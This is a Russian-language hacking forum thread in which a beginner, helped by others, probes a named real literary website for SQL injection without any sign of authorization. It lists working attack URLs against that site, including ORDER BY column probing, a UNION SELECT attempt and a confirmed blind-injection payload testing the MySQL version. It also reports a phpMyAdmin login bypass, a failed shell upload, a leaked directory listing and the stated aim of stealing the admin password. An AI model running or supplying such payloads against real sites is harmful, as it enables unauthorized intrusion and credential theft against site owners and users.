Всем снова привет =)
Вобщем начал я читать книги, статьи... чуток стал разбираться...
И вернулся все к тому же сайту- www.litsovet.ru
Там вроде есть SQL inj...
я с инекцией пока плохо знаком, но...
1 http://litsovet.ru/index.php/material.read?material_id=
(ставим кавычку получем вот такую фигню-
4¶
.4¶..Ў7¶staffЙВ’6¶ .htaccess9зГW¶kvit.htmIrз_W¶tz.zipВ• 6¶author.action.cphpЖmM¶ index.bakNзD\¶t.phpЗ�6¶css›6¶files1ГИ6¶imagesВ”tВ phpMyAdminА¬7¶gallery.action.cphp7¶ index.phpQз®7¶journal.action.cphpЇ7¶ konkurs.download.cphp+Г°7¶ konkurs.download.php5+Г±7¶litob.action.cph p®Гх6¶ material.action.cphp¬В©Z¶ robots.txtз®6¶$publications.action.cphp±В[¶ regs.php‰vзa.php8Вr4¶$sounds.action.cp hpВ.oldЉUзPИВtempцЎВоT¶ journal.download.phpЂ®В@U¶ knop1.gifaзz”Дaaaaa&ГmyadminSРВremЌ .info.php^uАэW¶viewcooc.php9eА
W¶index.php.currentЕ®PА tiny_mcez¦Ж]¶asd.htmlYіз9¶captcha.phpd¶mailtest.php9eА::¶imap.php№{зжb¶А kvitsb.htmзўf¶¬subscribe_confirm.phpљВ)
Это доказывает наличие уязвимости?!
Так же если в id= поставить "равенство" поста ну типа 964=965-1, то получим страницу 964...
Эм... проблема в том, что я пока не могу понять как искать поля =/
кто нить поможет?

Интересные вещи:
Там стоит Phpmyadmin, если в нем место логина поставить ковычку, то мы попадем в админку... тока с без привелегий(шелл залить не удалось =/ )
А ели обратится к ФТП этого сайта, и тоже вместо логина поставить ковычку, то поле логина просто исчезнет...
Вот...
просто хочу на примере разобраться в sql inj

Заранее спасибо =)
А еще спасибо тем, кто помог хоть чуток встать мне на правильный путь =)

если там не ставить кавычку то все-равно такая фигня вылазит, и это не sql-injection...
Просто криво написанный движок...
кстати в этой ошибке видны файлы лежать в директории... ;)

ггг накосяченый софт, кароче там типа листинг гг)

То есть хренушки мне а не иньекция?! (((
эм... блин, ну кому не влом, ну подскажите че делать то...
как добыть пасс админа без Xss =/
Пожалуйста =)))

а что такое CRLF injection?

какая то хрень если честно
http://litsovet.ru/index.php/material.read?material_id=1+order+by+31 - ошибка
http://litsovet.ru/index.php/material.read?material_id=1+order+by+30 - ошибки нет
НО
http://litsovet.ru/index.php/material.read?material_id=30+union+select+1,2,3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30/*
так тоже ошибка =\

так все таки есть там иньекция =)))?!

так все таки есть там иньекция =)))?!
есть.
http://litsovet.ru/index.php/material.read?material_id=123201+and(ascii(substri ng(version(),1,1))>51)
мускул 3 ветки, так что юнион не работает..

+там по идее кривая читалка файлов, ты подума получше, может чтото сможешь намутить с ней ;)

эм... и еще если не сложно скажите, а какого рака если я в ПХП МОЙ АДМИН в логине ставлю ковычку, то обхажу авторизацию?

c411k, хех, точно
Просто совсем забыл про 3 ветку